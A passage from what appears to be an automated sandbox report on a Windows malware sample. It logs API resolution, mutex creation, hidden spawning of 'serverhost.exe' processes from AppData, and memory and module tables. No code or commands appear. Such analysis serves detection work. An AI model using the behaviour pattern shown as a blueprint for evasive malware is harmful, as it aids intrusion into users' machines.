Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 True 2
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef59c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2ef69c True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2ef69c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef69c True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2ef69c True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef69c True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, desired_access = FILE_MAP_READ True 1
Service (1)
Operation Additional Information Success Count
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
System (7)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 2
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Get Time type = Ticks, time = 104973 True 1
Get Time type = Ticks, time = 105987 True 1
Get Time type = Ticks, time = 106985 True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Mutex (4)
Operation Additional Information Success Count
Create mutex_name = MB66D4A35 True 1
Create mutex_name = Global\I78B95E2E True 1
Create mutex_name = Global\M78B95E2E True 1
Release mutex_name = Global\I78B95E2E True 1
Process #10: serverhost.exe
(Host: 40, Network: 0)
Information Value
ID #10
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:11
OS Process Information
Information Value
PID 0xc04
Parent PID 0xbec (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C08
0x C10
0x C14
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory Readable, Writable True True False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True True False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000200000 0x00200000 0x00201fff Pagefile Backed Memory Readable True False False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000310000 0x00310000 0x003d7fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003e0000 0x003e0fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00400000 0x0045bfff Memory Mapped File Readable False False False
private_0x0000000000400000 0x00400000 0x004affff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x00423fff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x00411fff Private Memory Readable, Writable True True False
private_0x0000000000420000 0x00420000 0x0042cfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable True True False
private_0x0000000000440000 0x00440000 0x00448fff Private Memory Readable, Writable True True False
private_0x0000000000440000 0x00440000 0x00451fff Private Memory Readable, Writable True True False
private_0x0000000000450000 0x00450000 0x00458fff Private Memory Readable, Writable True True False
private_0x0000000000460000 0x00460000 0x0046cfff Private Memory Readable, Writable True True False
private_0x0000000000470000 0x00470000 0x004affff Private Memory Readable, Writable True True False
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True True False
pagefile_0x00000000004d0000 0x004d0000 0x005d0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005e0000 0x005e0000 0x009d2fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000009e0000 0x009e0000 0x00abefff Pagefile Backed Memory Readable True False False
private_0x0000000000ac0000 0x00ac0000 0x00ae3fff Private Memory Readable, Writable True True False
private_0x0000000000ac0000 0x00ac0000 0x00ad1fff Private Memory Readable, Writable True True False
private_0x0000000000b00000 0x00b00000 0x00bfffff Private Memory Readable, Writable True True False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01860000 0x01b2efff Memory Mapped File Readable False False False
private_0x0000000001b30000 0x01b30000 0x01b77fff Private Memory Readable, Writable True True False
private_0x0000000001b80000 0x01b80000 0x01c7ffff Private Memory Readable, Writable True True False
private_0x0000000001c80000 0x01c80000 0x01d7ffff Private Memory Readable, Writable True True False
private_0x0000000001d80000 0x01d80000 0x01dc7fff Private Memory Readable, Writable True True False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
Operation Filename Additional Information Success Count
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xc18, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (33)
Operation Module Additional Information Success Count
Load USER32.dll base_address = 0x76890000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load ntdll.dll base_address = 0x772a0000 True 1
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe base_address = 0xc40000 True 1
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 1
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x1cf74c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x1cf76c True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
System (2)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 1
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = MA991ED3B True 1
Process #11: serverhost.exe
(Host: 170, Network: 22)
Information Value
ID #11
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:09
OS Process Information
Information Value
PID 0xc18
Parent PID 0xc04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xC1C, 0xC20, 0xC24, 0xC28, 0xC2C, 0xC30, 0xC34, 0xC38, 0xC3C, 0xC40, 0xC44, 0xC48, 0xC4C, 0xC60, 0xC70, 0xC74
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x00177fff Pagefile Backed Memory Readable True False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00196fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x003d0fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x003e0000 0x003e0fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False
private_0x0000000000400000 0x00400000 0x00400fff Private Memory Readable, Writable True False False
private_0x0000000000410000 0x00410000 0x00418fff Private Memory Readable, Writable True True False
private_0x0000000000410000 0x00410000 0x0041cfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory Readable, Writable True False False
private_0x0000000000430000 0x00430000 0x00453fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x00441fff Private Memory Readable, Writable True False False
private_0x0000000000450000 0x00450000 0x0045cfff Private Memory Readable, Writable True False False
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000570000 0x00570000 0x00962fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x00970000 0x00c3efff Memory Mapped File Readable False False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
rpcss.dll 0x01860000 0x018bbfff Memory Mapped File Readable False False False
pagefile_0x0000000001860000 0x01860000 0x0193efff Pagefile Backed Memory Readable True False False
private_0x0000000001940000 0x01940000 0x01963fff Private Memory Readable, Writable True True False
private_0x0000000001940000 0x01940000 0x01951fff Private Memory Readable, Writable True False False
private_0x0000000001960000 0x01960000 0x01971fff Private Memory Readable, Writable True False False
private_0x0000000001970000 0x01970000 0x01978fff Private Memory Readable, Writable True True False
pagefile_0x0000000001980000 0x01980000 0x01996fff Pagefile Backed Memory Readable True False False
private_0x0000000001980000 0x01980000 0x0198ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001980000 0x01980000 0x01987fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001980000 0x01980000 0x01981fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001990000 0x01990000 0x01997fff Pagefile Backed Memory Readable, Writable True False False
index.dat 0x01990000 0x0199ffff Memory Mapped File Readable, Writable True False False
private_0x00000000019a0000 0x019a0000 0x01a9ffff Private Memory Readable, Writable True False False
private_0x0000000001aa0000 0x01aa0000 0x01c0ffff Private Memory Readable, Writable True True False
private_0x0000000001aa0000 0x01aa0000 0x01b9ffff Private Memory Readable, Writable True False False
index.dat 0x01ba0000 0x01ba7fff Memory Mapped File Readable, Writable True False False
index.dat 0x01bb0000 0x01bbffff Memory Mapped File Readable, Writable True False False
private_0x0000000001bc0000 0x01bc0000 0x01bc0fff Private Memory Readable, Writable True True False
pagefile_0x0000000001bc0000 0x01bc0000 0x01bc0fff Pagefile Backed Memory Readable True False False
private_0x0000000001bd0000 0x01bd0000 0x01c0ffff Private Memory Readable, Writable True False False
private_0x0000000001c10000 0x01c10000 0x01c57fff Private Memory Readable, Writable True False False
private_0x0000000001c60000 0x01c60000 0x01ca7fff Private Memory Readable, Writable True False False
rsaenh.dll 0x01cb0000 0x01cebfff Memory Mapped File Readable False False False
private_0x0000000001cb0000 0x01cb0000 0x01d2ffff Private Memory Readable, Writable True True False
private_0x0000000001cb0000 0x01cb0000 0x01ceffff Private Memory Readable, Writable True True False
private_0x0000000001cb0000 0x01cb0000 0x01cbffff Private Memory Readable, Writable True True False
pagefile_0x0000000001cb0000 0x01cb0000 0x01cb0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001cc0000 0x01cc0000 0x01cc0fff Pagefile Backed Memory Readable True False False
private_0x0000000001ce0000 0x01ce0000 0x01ceffff Private Memory Readable, Writable True False False
private_0x0000000001cf0000 0x01cf0000 0x01d15fff Private Memory Readable, Writable, Executable True False False
private_0x0000000001d20000 0x01d20000 0x01d2ffff Private Memory Readable, Writable True False False
private_0x0000000001db0000 0x01db0000 0x01eaffff Private Memory Readable, Writable True False False
private_0x0000000001eb0000 0x01eb0000 0x0200ffff Private Memory Readable, Writable True True False
private_0x0000000001eb0000 0x01eb0000 0x01faffff Private Memory Readable, Writable True False False
private_0x0000000001fd0000 0x01fd0000 0x0200ffff Private Memory Readable, Writable True False False
private_0x0000000002010000 0x02010000 0x0214ffff Private Memory Readable, Writable True True False
private_0x0000000002010000 0x02010000 0x0210ffff Private Memory Readable, Writable True False False
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False
private_0x00000000021d0000 0x021d0000 0x022cffff Private Memory Readable, Writable True False False
private_0x0000000002330000 0x02330000 0x0242ffff Private Memory Readable, Writable True False False
private_0x0000000002430000 0x02430000 0x024d5fff Private Memory Readable, Writable True True False
private_0x00000000024e0000 0x024e0000 0x025dffff Private Memory Readable, Writable True False False
private_0x0000000002730000 0x02730000 0x0276ffff Private Memory Readable, Writable True False False
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable True False False
private_0x0000000009ce0000 0x09ce0000 0x09ddffff Private Memory Readable, Writable True False False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x6e660000 0x6e667fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x6f800000 0x6f805fff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x6f880000 0x6f8d9fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x72040000 0x72045fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x72be0000 0x72bf4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x72c00000 0x72c51fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x733b0000 0x733bcfff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x735a0000 0x735a7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x735b0000 0x735c1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x735d0000 0x735dffff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x73fa0000 0x73fd7fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x740e0000 0x740e6fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x740f0000 0x7410bfff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x747f0000 0x747fffff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x749d0000 0x749d4fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74d00000 0x74d43fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74e30000 0x74e6bfff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x75270000 0x75275fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x753e0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x75890000 0x75892fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x76960000 0x76994fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
